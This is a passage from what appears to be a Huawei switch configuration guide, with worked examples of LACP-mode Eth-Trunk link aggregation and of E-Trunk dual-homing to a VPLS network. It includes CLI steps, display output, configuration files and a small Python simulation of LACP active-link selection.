l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 10 20
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 10 20
load-balance src-dst-mac
#
interface GigabitEthernet1/0/1
eth-trunk 1
#
interface GigabitEthernet1/0/2
eth-trunk 1
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/5
port link-type trunk
port trunk allow-pass vlan 20
#
return

6.2.2 Example for Configuring Link Aggregation in LACP Mode When Switches Are Directly
Connected

Link Aggregation in LACP Mode
Ethernet link aggregation bundles multiple physical links to form a logical link to increase
link bandwidth. Link aggregation can work in manual mode or Link Aggregation Control
Protocol (LACP) mode.
If a high link bandwidth between two directly connected devices is required and devices
support LACP, the LACP mode is recommended. The LACP mode increases bandwidth,
improves reliability, implements load balancing, enhances Eth-Trunk fault tolerance, and
provides backup.
In LACP mode, some links are active links, and all the active links participate in data
forwarding. If an active link becomes faulty, a link is selected among inactive links as the
active link. That is, the number of links participating in data forwarding remains unchanged.


Configuration Notes
l Member interfaces of an Eth-Trunk must use the same Ethernet type and rate.
l Both devices of the Eth-Trunk must use the same number of physical interfaces,
interface rate, duplex mode, and flow control mode.
l If an interface of the local device is added to an Eth-Trunk, an interface of the remote
device directly connected to the interface of the local device must also be added to an
Eth-Trunk so that the two ends can communicate.
l Both devices of an Eth-Trunk must use the same link aggregation mode.
l This example applies to all versions and products.

Networking Requirements
As shown in Figure 6-4, a LAG in LACP mode is configured on two directly connected
devices to improve bandwidth and reliability. The requirements are as follows:
l Two active links perform load balancing.
l One link functions as the backup link. When a fault occurs on the active link, the standby
link replaces the faulty link to ensure nonstop data transmission.

Figure 6-4 Networking for configuring link aggregation in LACP mode


[Figure: SwitchA and SwitchB are connected by Eth-Trunk 1 over GE1/0/1, GE1/0/2 and
GE1/0/3 on each switch; two links are active links and one is the backup link]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create an Eth-Trunk and configure the Eth-Trunk to work in LACP mode to implement
link aggregation.
2. Add member interfaces to the Eth-Trunk.
3. Set the system priority and determine the Actor so that the Partner selects active
interfaces based on the Actor interface priority.
4. Set the upper threshold for the number of active interfaces to improve reliability.
5. Set interface priorities and determine active interfaces so that interfaces with higher
priorities are selected as active interfaces.

Procedure
Step 1 Create Eth-Trunk 1 on SwitchA and configure Eth-Trunk 1 to work in LACP mode. The
configuration of SwitchB is similar to that of SwitchA, and is not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] interface eth-trunk 1 //Create Eth-Trunk 1.


[SwitchA-Eth-Trunk1] mode lacp //Configure link aggregation in LACP mode.
[SwitchA-Eth-Trunk1] quit

Step 2 Add member interfaces to Eth-Trunk 1 on SwitchA. The configuration of SwitchB is similar
to that of SwitchA, and is not mentioned here.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] eth-trunk 1 //Add GE1/0/1 to Eth-Trunk 1.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] eth-trunk 1 //Add GE1/0/2 to Eth-Trunk 1.
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] eth-trunk 1 //Add GE1/0/3 to Eth-Trunk 1.
[SwitchA-GigabitEthernet1/0/3] quit

Step 3 Set the system LACP priority of SwitchA to 100 so that SwitchA becomes the Actor.
[SwitchA] lacp priority 100 //The default system LACP priority is 32768. Change
the LACP priority of SwitchA to be higher than that of SwitchB so that SwitchA
functions as the Actor.

Step 4 On SwitchA, set the upper threshold for the number of active interfaces to 2.
[SwitchA] interface eth-trunk 1
[SwitchA-Eth-Trunk1] max active-linknumber 2 //The default upper threshold for
the number of active interfaces in the LAG is 8. Change the upper threshold for
the number of active interfaces to 2.
[SwitchA-Eth-Trunk1] quit

Step 5 Set the interface LACP priority and determine active links on SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] lacp priority 100 //The default interface LACP
priority is 32768. Change the LACP priority of GE1/0/1 to 100 so that GE1/0/1
serves as the active interface.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] lacp priority 100 //The default interface LACP
priority is 32768. Change the LACP priority of GE1/0/2 to 100 so that GE1/0/2
serves as the active interface.
[SwitchA-GigabitEthernet1/0/2] quit

Step 6 Verify the configuration.
# Check information about the Eth-Trunk on each Switch and check whether link negotiation
is successful.
[SwitchA] display eth-trunk 1
Eth-Trunk1's state information is:
Local:
LAG ID: 1 WorkingMode: LACP
Preempt Delay: Disabled Hash arithmetic: According to SIP-XOR-DIP
System Priority: 100 System ID: 00e0-fca8-0417
Least Active-linknumber: 1 Max Active-linknumber: 2
Operate status: up Number Of Up Port In Trunk: 2
--------------------------------------------------------------------------------
ActorPortName Status PortType PortPri PortNo PortKey PortState Weight
GigabitEthernet1/0/1 Selected 1GE 100 6145 2865 11111100 1
GigabitEthernet1/0/2 Selected 1GE 100 6146 2865 11111100 1
GigabitEthernet1/0/3 Unselect 1GE 32768 6147 2865 11100000 1

Partner:
--------------------------------------------------------------------------------
ActorPortName SysPri SystemID PortPri PortNo PortKey PortState
GigabitEthernet1/0/1 32768 00e0-fca6-7f85 32768 6145 2609 11111100
GigabitEthernet1/0/2 32768 00e0-fca6-7f85 32768 6146 2609 11111100
GigabitEthernet1/0/3 32768 00e0-fca6-7f85 32768 6147 2609 11110000

The preceding information shows that the system LACP priority of SwitchA is 100 and is
higher than the system LACP priority of SwitchB. GigabitEthernet1/0/1 and
GigabitEthernet1/0/2 are active interfaces and are in Selected state. GigabitEthernet1/0/3 is in
Unselect state. In addition, load balancing and redundancy are implemented.

----End
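The following Python script is an added example, not Huawei code: it reproduces the Actor
choice and the active interface selection behind Steps 3 to 5, using the system priorities,
system IDs, port priorities and port numbers printed by display eth-trunk 1 above, and then
shows GE1/0/3 taking over when GE1/0/1 goes down. The system ID tie-break follows standard
LACP and is not stated on this page.

```python
"""Active link selection for an Eth-Trunk in LACP mode.

Added example (not Huawei code). It reproduces the decisions behind Steps 3
to 5 and the 'display eth-trunk 1' output above: the device with the higher
system LACP priority (the lower numeric value; a tie falls to the lower
system ID, as in standard LACP) is the Actor, and the Actor ranks member
interfaces by interface LACP priority and then port number, marking the
first 'max active-linknumber' up interfaces Selected and the rest Unselect.
The failover function shows a backup link taking over when an active
interface goes down. Port data is taken from the output above.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class LacpSystem:
    name: str
    priority: int       # system LACP priority, default 32768, lower value wins
    system_id: str      # System ID (MAC) as printed by display eth-trunk


@dataclass(frozen=True)
class LacpPort:
    name: str
    priority: int = 32768   # interface LACP priority, lower value wins
    number: int = 0         # PortNo column of display eth-trunk
    up: bool = True


def choose_actor(local, partner):
    """The system with the lower (priority, system_id) pair becomes the Actor."""
    return min((local, partner), key=lambda s: (s.priority, s.system_id))


def select_active(ports, max_active, least_active=1):
    """Return ({port name: 'Selected'|'Unselect'}, trunk operate status).

    Up interfaces are ranked by (interface priority, port number); the first
    max_active become Selected. The trunk is up only when at least
    least_active interfaces are Selected (Least Active-linknumber above)."""
    ranked = sorted((p for p in ports if p.up), key=lambda p: (p.priority, p.number))
    chosen = {p.name for p in ranked[:max_active]}
    status = {p.name: ("Selected" if p.name in chosen else "Unselect") for p in ports}
    operate = "up" if len(chosen) >= least_active else "down"
    return status, operate


def failover(ports, max_active, failed_name):
    """Mark one member interface down and recompute the selection."""
    updated = [replace(p, up=False) if p.name == failed_name else p for p in ports]
    return select_active(updated, max_active)


# Values taken from the display eth-trunk 1 output above.
SWITCH_A = LacpSystem("SwitchA", 100, "00e0-fca8-0417")
SWITCH_B = LacpSystem("SwitchB", 32768, "00e0-fca6-7f85")
PORTS_A = [
    LacpPort("GigabitEthernet1/0/1", priority=100, number=6145),
    LacpPort("GigabitEthernet1/0/2", priority=100, number=6146),
    LacpPort("GigabitEthernet1/0/3", priority=32768, number=6147),
]

if __name__ == "__main__":
    print("Actor:", choose_actor(SWITCH_A, SWITCH_B).name)
    print("normal:", select_active(PORTS_A, max_active=2))
    print("GE1/0/1 down:", failover(PORTS_A, 2, "GigabitEthernet1/0/1"))
```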

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
lacp priority 100
#
interface Eth-Trunk1
mode lacp
max active-linknumber 2
#
interface GigabitEthernet1/0/1
eth-trunk 1
lacp priority 100
#
interface GigabitEthernet1/0/2
eth-trunk 1
lacp priority 100
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
return

l Configuration file of SwitchB
#
sysname SwitchB
#
interface Eth-Trunk1
mode lacp
#
interface GigabitEthernet1/0/1
eth-trunk 1
#
interface GigabitEthernet1/0/2
eth-trunk 1
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
return

6.2.3 Example for Connecting an E-Trunk to a VPLS Network

E-Trunk Overview
Enhanced Trunk (E-Trunk) is an extension to LACP (a link aggregation protocol for a single
device) and implements link aggregation among multiple devices. E-Trunk achieves device-
level link reliability but not card-level link reliability.

When a CE is dual-homed to a VPLS, VLL, or PWE3 network, an E-Trunk can be configured
to protect the links between the CE and PEs and implement backup between PEs. If no E-
Trunk is configured, a CE can be connected to only one PE using an Eth-Trunk. If the Eth-
Trunk or the PE fails, the CE cannot communicate with the PE. After the E-Trunk is used, the
CE can be dual-homed to two PEs to implement backup.


Configuration Notes
l Devices must use link aggregation in LACP mode.
l As shown in Figure 6-5, the E-Trunk configuration on PE1 and PE2 must be the same.
The Eth-Trunks between PE1 and CE1 and between PE2 and CE1 must use the same rate
and duplex mode (key values must be the same) and join the same E-Trunk. After the
Eth-Trunks are added to the E-Trunk, ensure that the LACP priorities and system IDs of
PE1 and PE2 are the same. On CE1, CE1 interfaces directly connected to PE1 and PE2
must be added to the same Eth-Trunk. The Eth-Trunk can have a different Eth-Trunk ID
from that on the PEs. For example, the CE is configured with Eth-Trunk 20, while both
PEs are configured with Eth-Trunk 10.
l You must specify an IP address (loopback address recommended) for each PE to ensure
Layer 3 connectivity. Ensure that the peer IP address of a PE is the local IP address of
the other PE.
l The E-Trunk must be bound to a BFD session.
l You must set the same protocol packet password for PE1 and PE2.
l This example applies to all versions of the S12700.

Networking Requirements
If no E-Trunk is configured, a CE can be connected to only one PE using an Eth-Trunk. If the
Eth-Trunk or the PE fails, the CE cannot communicate with the PE. After an E-Trunk is
configured, the CE can be dual-homed to PEs. E-Trunk achieves device-level link reliability
but not card-level link reliability.
As shown in Figure 6-5, CE1 is connected to PE1 and PE2 using two Eth-Trunks in LACP
mode and is dual-homed to a VPLS network.
Initially, CE1 communicates with CE2 on the VPLS network through PE1. If PE1 or the Eth-
Trunk between CE1 and PE1 fails, CE1 cannot communicate with CE2. To prevent service
interruption, configure an E-Trunk on PE1 and PE2. When communication between CE1 and
PE1 fails, traffic is switched to PE2 so that CE1 can communicate with CE2 through PE2.
When PE1 or the Eth-Trunk between CE1 and PE1 recovers, traffic is switched back to PE1.
The E-Trunk implements backup of link aggregation groups (LAGs) between PE1 and PE2
and therefore improves network reliability.


Figure 6-5 Connecting an E-Trunk to a VPLS network


[Figure: CE1 connects through Eth-Trunk20 to both PE1 and PE2, each of which terminates
the links in Eth-Trunk10 and joins E-Trunk1; PE1 and PE2 connect to PE3, and PE3
connects to CE2; PE1, PE2 and PE3 each have a Loopback1 interface; the interfaces and
addresses are listed in the table below]

Switch   Interface               Layer 3 Interface        IP Address
PE1      GigabitEthernet1/0/1    -                        -
         GigabitEthernet1/0/2    -                        -
         GigabitEthernet1/0/3    VLANIF 100               10.1.1.1/24
         Loopback1               -                        1.1.1.9/32
PE2      GigabitEthernet1/0/1    -                        -
         GigabitEthernet1/0/2    -                        -
         GigabitEthernet1/0/3    VLANIF 200               10.1.2.1/24
         Loopback1               -                        2.2.2.9/32
PE3      GigabitEthernet1/0/1    VLANIF 100               10.1.1.2/24
         GigabitEthernet1/0/2    VLANIF 200               10.1.2.2/24
         GigabitEthernet1/0/3    GigabitEthernet1/0/3.1   -
         Loopback1               -                        3.3.3.9/32
CE1      GigabitEthernet1/0/1    -                        -
         GigabitEthernet1/0/2    -                        -
         GigabitEthernet1/0/3    -                        -
         GigabitEthernet1/0/4    -                        -
CE2      GigabitEthernet1/0/3    -                        -

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure an E-Trunk as follows:
– Create Eth-Trunks in LACP mode between CE1 and PE1 and between CE1 and
PE2. Add member interfaces to the Eth-Trunks.
– Create an E-Trunk on PE1 and PE2 and add the two Eth-Trunks in LACP mode to
the E-Trunk.
– Set the following parameters of the E-Trunk:
n E-Trunk priority
n LACP system ID and LACP priority of the E-Trunk
n Interval at which Hello packets are sent
n Time multiplier for detecting Hello packets
n IP addresses of the local and remote ends
– Bind the E-Trunk to a BFD session.
2. Configure CE1 to connect to the VPLS network as follows:
– Configure a routing protocol on the backbone network to implement the
interworking between devices.
– Configure basic MPLS functions and LDP.
– Enable MPLS L2VPN on PEs.
– Configure a VSI and specify LDP as the signaling protocol.
– Create Eth-Trunk sub-interfaces and bind the VSI to the sub-interfaces.

Procedure
Step 1 Configure VLANs and IP addresses on the PW-side interfaces according to Figure 6-5.
Configure a routing protocol on the backbone network to implement the interworking
between devices. OSPF is used in this example.
# Configure aggregation switch PE1.
<HUAWEI> system-view
[HUAWEI] sysname PE1
[PE1] vlan batch 100
[PE1] interface gigabitethernet 1/0/3
[PE1-GigabitEthernet1/0/3] port link-type trunk
[PE1-GigabitEthernet1/0/3] port trunk allow-pass vlan 100


[PE1-GigabitEthernet1/0/3] quit
[PE1] interface vlanif 100
[PE1-Vlanif100] ip address 10.1.1.1 24
[PE1-Vlanif100] quit
[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.9 32
[PE1-LoopBack1] quit
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.9 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

# Configure aggregation switch PE2.


<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] vlan batch 200
[PE2] interface gigabitethernet 1/0/3
[PE2-GigabitEthernet1/0/3] port link-type trunk
[PE2-GigabitEthernet1/0/3] port trunk allow-pass vlan 200
[PE2-GigabitEthernet1/0/3] quit
[PE2] interface vlanif 200
[PE2-Vlanif200] ip address 10.1.2.1 24
[PE2-Vlanif200] quit
[PE2] interface loopback 1
[PE2-LoopBack1] ip address 2.2.2.9 32
[PE2-LoopBack1] quit
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1-area-0.0.0.0] network 2.2.2.9 0.0.0.0
[PE2-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255
[PE2-ospf-1-area-0.0.0.0] quit
[PE2-ospf-1] quit

# Configure aggregation switch PE3.


<HUAWEI> system-view
[HUAWEI] sysname PE3
[PE3] vlan batch 100 200
[PE3] interface gigabitethernet 1/0/1
[PE3-GigabitEthernet1/0/1] port link-type trunk
[PE3-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[PE3-GigabitEthernet1/0/1] quit
[PE3] interface gigabitethernet 1/0/2
[PE3-GigabitEthernet1/0/2] port link-type trunk
[PE3-GigabitEthernet1/0/2] port trunk allow-pass vlan 200
[PE3-GigabitEthernet1/0/2] quit
[PE3] interface vlanif 100
[PE3-Vlanif100] ip address 10.1.1.2 24
[PE3-Vlanif100] quit
[PE3] interface vlanif 200
[PE3-Vlanif200] ip address 10.1.2.2 24
[PE3-Vlanif200] quit
[PE3] interface loopback 1
[PE3-LoopBack1] ip address 3.3.3.9 32
[PE3-LoopBack1] quit
[PE3] ospf 1
[PE3-ospf-1] area 0
[PE3-ospf-1-area-0.0.0.0] network 3.3.3.9 0.0.0.0
[PE3-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[PE3-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255
[PE3-ospf-1-area-0.0.0.0] quit
[PE3-ospf-1] quit

After the configuration is complete, PE1, PE2, and PE3 use OSPF to discover IP routes to
Loopback1 of one another, and can ping one another. Run the display ip routing-table
command on PE1, PE2, and PE3. You can see that the PEs have learned the routes to one
another.

NOTE

l The AC-side interface and PW-side interface of a PE cannot be added to the same VLAN; otherwise,
a loop may occur.
l When configuring OSPF, configure PE1, PE2, and PE3 to advertise 32-bit loopback addresses.

Step 2 Configure Eth-Trunks in LACP mode on user-side switch CE1, PE1, and PE2, and add
member interfaces to the Eth-Trunks. Configure Layer 2 forwarding on CE1.

# Configure CE1.
<HUAWEI> system-view
[HUAWEI] sysname CE1
[CE1] vlan batch 10
[CE1] interface eth-trunk 20 //Create Eth-Trunk 20 and enter the view of Eth-Trunk 20.
[CE1-Eth-Trunk20] port link-type trunk //Set the link type of the interface to trunk.
[CE1-Eth-Trunk20] port trunk allow-pass vlan 10 //Add Eth-Trunk 20 to VLAN 10.
[CE1-Eth-Trunk20] mode lacp //Configure Eth-Trunk 20 to work in LACP mode.
[CE1-Eth-Trunk20] trunkport GigabitEthernet 1/0/1 to 1/0/4 //Add GE1/0/1 to GE1/0/4 to Eth-Trunk20.
[CE1-Eth-Trunk20] quit

# Configure PE1.
[PE1] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-Trunk 10.
[PE1-Eth-Trunk10] port link-type trunk //Set the link type of the interface to trunk.
[PE1-Eth-Trunk10] mode lacp //Configure Eth-Trunk 10 to work in LACP mode.
[PE1-Eth-Trunk10] trunkport GigabitEthernet 1/0/1 to 1/0/2 //Add GE1/0/1 and GE1/0/2 to Eth-Trunk10.
[PE1-Eth-Trunk10] quit

# Configure PE2.
[PE2] interface eth-trunk 10 //Create Eth-Trunk 10 and enter the view of Eth-Trunk 10.
[PE2-Eth-Trunk10] port link-type trunk //Set the link type of the interface to trunk.
[PE2-Eth-Trunk10] mode lacp //Configure Eth-Trunk 10 to work in LACP mode.
[PE2-Eth-Trunk10] trunkport GigabitEthernet 1/0/1 to 1/0/2 //Add GE1/0/1 and GE1/0/2 to Eth-Trunk10.
[PE2-Eth-Trunk10] quit

Step 3 Create an E-Trunk and set the LACP priority, LACP system ID, E-Trunk priority, time
multiplier for detecting hello packets, interval at which hello packets are sent, and local and
remote IP addresses.

# Configure PE1.
[PE1] e-trunk 1 //Create E-Trunk 1 and enter the view of E-Trunk 1.
[PE1-e-trunk-1] quit
[PE1] lacp e-trunk priority 1 //Set the LACP priority of E-Trunk 1 to 1.
[PE1] lacp e-trunk system-id 00E0-FC00-0000 //Set the LACP system ID of E-Trunk 1 to 00E0-FC00-0000.
[PE1] e-trunk 1 //Enter the view of E-Trunk 1.
[PE1-e-trunk-1] priority 10 //Set the priority of E-Trunk 1 to 10.
[PE1-e-trunk-1] timer hold-on-failure multiplier 3 //Set the time multiplier for detecting hello packets to 3.
[PE1-e-trunk-1] timer hello 9 //Set the interval at which hello packets are sent to 9 (in units of 100 ms, that is, 900 ms; see the Send-Period (100ms) field in the display e-trunk output).
[PE1-e-trunk-1] peer-address 2.2.2.9 source-address 1.1.1.9 //Set the remote IP address to 2.2.2.9 and local IP address to 1.1.1.9.
[PE1-e-trunk-1] quit

# Configure PE2.
[PE2] e-trunk 1 //Create E-Trunk 1 and enter the view of E-Trunk 1.
[PE2-e-trunk-1] quit
[PE2] lacp e-trunk priority 1 //Set the LACP priority of E-Trunk 1 to 1.
[PE2] lacp e-trunk system-id 00E0-FC00-0000 //Set the LACP system ID of E-Trunk 1 to 00E0-FC00-0000.
[PE2] e-trunk 1 //Enter the view of E-Trunk 1.
[PE2-e-trunk-1] priority 20 //Set the priority of E-Trunk 1 to 20.
[PE2-e-trunk-1] timer hold-on-failure multiplier 3 //Set the time multiplier for detecting hello packets to 3.
[PE2-e-trunk-1] timer hello 9 //Set the interval at which hello packets are sent to 9 (in units of 100 ms, that is, 900 ms).
[PE2-e-trunk-1] peer-address 1.1.1.9 source-address 2.2.2.9 //Set the remote IP address to 1.1.1.9 and local IP address to 2.2.2.9.
[PE2-e-trunk-1] quit

Step 4 Add the Eth-Trunks in LACP mode to the E-Trunk.


# Configure PE1.
[PE1] interface eth-trunk 10 //Enter the view of Eth-Trunk 10.
[PE1-Eth-Trunk10] e-trunk 1 //Add Eth-Trunk 10 to E-Trunk 1.
[PE1-Eth-Trunk10] quit

# Configure PE2.
[PE2] interface eth-trunk 10 //Enter the view of Eth-Trunk 10.
[PE2-Eth-Trunk10] e-trunk 1 //Add Eth-Trunk 10 to E-Trunk 1.
[PE2-Eth-Trunk10] quit

Step 5 Bind the E-Trunk to a BFD session.


l Create a BFD session.
# Configure PE1.
[PE1] bfd //Enable BFD.
[PE1-bfd] quit
[PE1] bfd hello1 bind peer-ip 2.2.2.9 source-ip 1.1.1.9 //Create a BFD session named hello1 and bind the BFD session to remote IP address 2.2.2.9 and local IP address 1.1.1.9.
[PE1-bfd-session-hello1] discriminator local 1 //Set the local discriminator to 1.
[PE1-bfd-session-hello1] discriminator remote 2 //Set the remote discriminator to 2.
[PE1-bfd-session-hello1] commit //Commit the BFD session configuration.
[PE1-bfd-session-hello1] quit

The IP addresses of the local and remote ends of a BFD session must be the same as
those of the E-Trunk.
# Configure PE2.
[PE2] bfd
[PE2-bfd] quit
[PE2] bfd hello2 bind peer-ip 1.1.1.9 source-ip 2.2.2.9 //Create a BFD session named hello2 and bind the BFD session to remote IP address 1.1.1.9 and local IP address 2.2.2.9.
[PE2-bfd-session-hello2] discriminator local 2 //Set the local discriminator to 2.
[PE2-bfd-session-hello2] discriminator remote 1 //Set the remote discriminator to 1.
[PE2-bfd-session-hello2] commit //Commit the BFD session configuration.
[PE2-bfd-session-hello2] quit

l Bind E-Trunk 1 to the BFD session.


# Configure PE1.
[PE1] e-trunk 1 //Enter the view of E-Trunk 1.
[PE1-e-trunk-1] e-trunk track bfd-session session-name hello1 //Bind E-Trunk 1 to the BFD session hello1.
[PE1-e-trunk-1] quit

# Configure PE2.
[PE2] e-trunk 1 //Enter the view of E-Trunk 1.
[PE2-e-trunk-1] e-trunk track bfd-session session-name hello2 //Bind E-Trunk 1 to the BFD session hello2.
[PE2-e-trunk-1] quit

Step 6 Configure PEs so that CE1 can access the VPLS network.
1. Configure basic MPLS functions and LDP on PE1, PE2, and PE3.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.9 //Set the LSR ID to 1.1.1.9.
[PE1] mpls //Enable global MPLS.
[PE1-mpls] quit
[PE1] mpls ldp //Enable global LDP.
[PE1-mpls-ldp] quit
[PE1] interface vlanif 100
[PE1-Vlanif100] mpls //Enable MPLS on an interface.
[PE1-Vlanif100] mpls ldp //Enable LDP on an interface.
[PE1-Vlanif100] quit

# Configure PE2.
[PE2] mpls lsr-id 2.2.2.9 //Set the LSR ID to 2.2.2.9.
[PE2] mpls //Enable global MPLS.
[PE2-mpls] quit
[PE2] mpls ldp //Enable global LDP.
[PE2-mpls-ldp] quit
[PE2] interface vlanif 200
[PE2-Vlanif200] mpls //Enable MPLS on an interface.
[PE2-Vlanif200] mpls ldp //Enable LDP on an interface.
[PE2-Vlanif200] quit

# Configure PE3.
[PE3] mpls lsr-id 3.3.3.9 //Set the LSR ID to 3.3.3.9.
[PE3] mpls //Enable global MPLS.
[PE3-mpls] quit
[PE3] mpls ldp //Enable global LDP.
[PE3-mpls-ldp] quit
[PE3] interface vlanif 100
[PE3-Vlanif100] mpls //Enable MPLS on an interface.
[PE3-Vlanif100] mpls ldp //Enable LDP on an interface.
[PE3-Vlanif100] quit
[PE3] interface vlanif 200
[PE3-Vlanif200] mpls //Enable MPLS on an interface.
[PE3-Vlanif200] mpls ldp //Enable LDP on an interface.
[PE3-Vlanif200] quit

After the configuration is complete, run the display mpls ldp session command on PEs.
You can see that the status of the remote LDP peer relationship is Operational,
indicating that remote LDP sessions are set up.
2. Enable MPLS L2VPN on PE1, PE2, and PE3.
# Configure PE1.
[PE1] mpls l2vpn //Enable global MPLS L2VPN.
[PE1-l2vpn] quit

# Configure PE2.
[PE2] mpls l2vpn //Enable global MPLS L2VPN.
[PE2-l2vpn] quit

# Configure PE3.
[PE3] mpls l2vpn //Enable global MPLS L2VPN.
[PE3-l2vpn] quit

3. Create a VSI ldp1 on PE1, PE2, and PE3 and specify LDP as the signaling protocol in
the VSI.
# Configure PE1.
[PE1] vsi ldp1 static //Create a VSI named ldp1 and configure static member discovery.
[PE1-vsi-ldp1] pwsignal ldp //Set the signaling mode to LDP.
[PE1-vsi-ldp1-ldp] vsi-id 2 //Set the ID of the VSI to 2.
[PE1-vsi-ldp1-ldp] peer 3.3.3.9 //Set the peer address of the VSI to 3.3.3.9.
[PE1-vsi-ldp1-ldp] quit
[PE1-vsi-ldp1] quit
# Configure PE2.
[PE2] vsi ldp1 static //Create a VSI named ldp1 and configure static member discovery.
[PE2-vsi-ldp1] pwsignal ldp //Set the signaling mode to LDP.
[PE2-vsi-ldp1-ldp] vsi-id 2 //Set the ID of the VSI to 2.
[PE2-vsi-ldp1-ldp] peer 3.3.3.9 //Set the peer address of the VSI to 3.3.3.9.
[PE2-vsi-ldp1-ldp] quit
[PE2-vsi-ldp1] quit
# Configure PE3.
[PE3] vsi ldp1 static //Create a VSI named ldp1 and configure static member discovery.
[PE3-vsi-ldp1] pwsignal ldp //Set the signaling mode to LDP.
[PE3-vsi-ldp1-ldp] vsi-id 2 //Set the ID of the VSI to 2.
[PE3-vsi-ldp1-ldp] peer 1.1.1.9 //Set the peer address of the VSI to 1.1.1.9.
[PE3-vsi-ldp1-ldp] peer 2.2.2.9 //Set the peer address of the VSI to 2.2.2.9.
[PE3-vsi-ldp1-ldp] quit
[PE3-vsi-ldp1] quit
4. Configure Eth-Trunk sub-interfaces on PE1 and PE2, and bind the VSI to the Eth-Trunk
sub-interfaces.
# Configure PE1.
[PE1] interface Eth-Trunk 10.1 //Create Eth-Trunk 10.1 and enter the view of Eth-Trunk 10.1.
[PE1-Eth-Trunk10.1] dot1q termination vid 10 //Set the single VLAN ID for dot1q encapsulation on Eth-Trunk 10.1 to VLAN 10.
[PE1-Eth-Trunk10.1] l2 binding vsi ldp1 //Bind Eth-Trunk 10.1 to the VSI ldp1.
[PE1-Eth-Trunk10.1] quit
# Configure PE2.
[PE2] interface Eth-Trunk 10.1 //Create Eth-Trunk 10.1 and enter the view of Eth-Trunk 10.1.
[PE2-Eth-Trunk10.1] dot1q termination vid 10 //Set the single VLAN ID for dot1q encapsulation on Eth-Trunk 10.1 to VLAN 10.
[PE2-Eth-Trunk10.1] l2 binding vsi ldp1 //Bind Eth-Trunk 10.1 to the VSI ldp1.
[PE2-Eth-Trunk10.1] quit
5. Configure a sub-interface on PE3 and bind the VSI to the sub-interface.
# Configure PE3.
[PE3] interface gigabitethernet 1/0/3.1 //Create GE1/0/3.1 and enter the view of GE1/0/3.1.
[PE3-GigabitEthernet1/0/3.1] dot1q termination vid 10 //Set the single VLAN ID for dot1q encapsulation on GE1/0/3.1 to VLAN 10.
[PE3-GigabitEthernet1/0/3.1] l2 binding vsi ldp1 //Bind GE1/0/3.1 to the VSI ldp1.
[PE3-GigabitEthernet1/0/3.1] quit

Step 7 Verify the configuration.


l Run the display eth-trunk command on CE1 to check the Eth-Trunk configuration.
l Run the display e-trunk command to check information about the E-Trunk.
# Check information about E-Trunk 1 on PE1.
[PE1] display e-trunk 1
The E-Trunk information
E-TRUNK-ID : 1 Revert-Delay-Time (s) : 120
Priority : 10 System-ID : 00e0-0f74-eb00
Peer-IP : 2.2.2.9 Source-IP : 1.1.1.9
State : Master Causation : PRI
Send-Period (100ms) : 9 Fail-Time (100ms) : 27
Receive : 41 Send : 42
RecDrop : 0 SndDrop : 0
Peer-Priority : 20 Peer-System-ID : 00e0-3b6c-6100
Peer-Fail-Time (100ms) : 27 BFD-Session : hello1
Description : -
--------------------------------------------------------------------------------
The Member information
Type ID LocalPhyState Work-Mode State Causation Remote-ID
Eth-Trunk 10 Up auto Master ETRUNK_MASTER 10

# Check information about E-Trunk 1 on PE2.


[PE2] display e-trunk 1
The E-Trunk information
E-TRUNK-ID : 1 Revert-Delay-Time (s) : 120
Priority : 20 System-ID : 00e0-3b6c-6100
Peer-IP : 1.1.1.9 Source-IP : 2.2.2.9
State : Backup Causation : PRI
Send-Period (100ms) : 9 Fail-Time (100ms) : 27
Receive : 43 Send : 42
RecDrop : 3 SndDrop : 0
Peer-Priority : 10 Peer-System-ID : 00e0-0f74-eb00
Peer-Fail-Time (100ms) : 27 BFD-Session : hello2
Description : -
--------------------------------------------------------------------------------
The Member information
Type ID LocalPhyState Work-Mode State Causation Remote-ID
Eth-Trunk 10 Down auto Backup ETRUNK_BACKUP 10

The preceding information shows that the E-Trunk priority on PE1 is 10, and the E-
Trunk status is Master; the E-Trunk priority on PE2 is 20, and the E-Trunk status is
Backup. Device backup is implemented.

----End

Configuration Files
l Configuration file of CE1
#
sysname CE1
#
vlan batch 10
#
interface Eth-Trunk20
port link-type trunk
port trunk allow-pass vlan 10
mode lacp
#
interface GigabitEthernet1/0/1
eth-trunk 20
#
interface GigabitEthernet1/0/2
eth-trunk 20
#
interface GigabitEthernet1/0/3
eth-trunk 20
#
interface GigabitEthernet1/0/4
eth-trunk 20
#
return
l Configuration file of PE1
#
sysname PE1
#
vlan batch 100
#
lacp e-trunk system-id 00e0-fc00-0000
lacp e-trunk priority 1
#
bfd
#
mpls lsr-id 1.1.1.9
mpls
#
mpls l2vpn
#
